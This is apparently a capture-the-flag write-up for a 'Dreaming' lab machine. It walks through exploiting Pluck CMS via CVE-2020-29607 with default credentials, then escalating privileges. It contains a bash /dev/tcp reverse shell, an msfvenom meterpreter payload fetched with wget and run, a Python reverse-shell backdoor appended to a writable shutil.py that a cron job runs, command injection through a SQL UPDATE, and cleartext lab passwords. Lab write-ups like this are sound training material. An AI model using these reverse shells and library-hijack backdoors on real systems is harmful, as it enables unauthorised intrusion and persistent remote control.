Dreaming
URLs
- dreaming.thm/app
- http://dreaming.thm/app/pluck-4.7.13/
- Vulnerable to CVE-2020-29607
Creds
- Pluck
- password
- Luciean
- Found in /opt/test.py
- HeyLucien#@1999!
- mysql -u lucien -plucien42DBPASSWORD
- found in .bash_history
- Found in /opt/test.py
- Death
- Found SQL password in getDream.py
- !mementoMORI666!
- This was reused
- Found SQL password in getDream.py
RCE
Using the vulnerability to, CVE-2020-29607, we can upload a php payload and get a p0wny web shell. From here, we can create a full(ish) shell by doing 1. bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1' 2. python3 -c 'import pty; pty.spawn("/bin/bash")' Along with a netcat listener on our attacker From here, we can spin up a simple python3 http.server and send over a meterpreter payload
Meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.13.77.246 LPORT=4444 -f elf -o meterpreter.elf
and run a python server
python3 -m http.server 8080
In metasploit, create a listener
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
run -j
Now, if we run:
cd /tmp
wget http://10.13.77.246:8000/meterpreter.elf
chmod +x meterpreter.elf
./meterpreter.elf
We should get a new session where we can begin running payloads
Vulnerabilies
CVE
- Pluck is vulnerable to CVE-2020-29607 Score 7.3
- Due to default creds, this is garunteed RCE
Escalations
Despite running linpeas and getting CVE-2021-3560, this appears to be patched.
Permissions
- Running sudo -l we see lucien has permission to run
(death) NOPASSWD: /usr/bin/python3 /home/death/getDreams.py - ROOT LOGIN
- Sudo is not setup, and people keep logging in as root which is terrible pracitce
- Morpheus has passwordless sudo
- He is essentially root
- We can run
sudo su -to text this, and sure enough, we get logged in as root
Password usage
Bad passwords
- pluck is using
passwordon a public facing website
Usage
- Passwords were found being used in cleartext in .bash_history
- Death reused his SQL password as his login
Files
/home/Death/getDreams.py
- This is owned by Death, but can be run as sudo by lucien.
- A copy with redacted password can be found in /opt
- This tells us we can use SQL
/usr/lib/python3.8/shutil.py
- This file occurs in Death's vim history. Upon inspection, its permissions are incorrect
- -rw-rw-r-- 1 root death 51K Mar 18 20:04 shutil.py
-
We can add the following expoit to this file:
echo 'open("/tmp/morpheus_flag.txt", "w").write(open("/home/morpheus/morpheus_flag.txt").read())' | tee -a /usr/lib/python3.8/shutil.py -
If we wait a few minutes, the script gets run by Morpheus and we get our file
- We can take this MUCH further
import socket, subprocess, os try: with open("/tmp/.rev", "r") as f: ip, port = f.read().strip().split(":") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, int(port))) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) p = subprocess.call(["/bin/bash", "-i"]) except: pass
Now we simply add our ip to .rev echo '10.13.77.246:4444' > /tmp/.rev
- Wait a few minutes and we will get a shell for Morpheus
/home/morpheus/restore.py
- As previously noted, shutil.py is vulnerable due to group ownership by Death
from shutil import copy2 as backup src_file = "/home/morpheus/kingdom" dst_file = "/kingdom_backup/kingdom" backup(src_file, dst_file) print("The kingdom backup has been done!")
It seems Morpheus has a cron job on this file based on observations when changing shutil.py using Death
SQL
By logging into MySQL using Luciens cleartext password, we can run some injections.
UPDATE dreams SET dream="test; cat /home/death/death_flag.txt > /tmp/death_flag.txt" WHERE dreamer="Alice";
cat /home/death/.* we can dump all the history files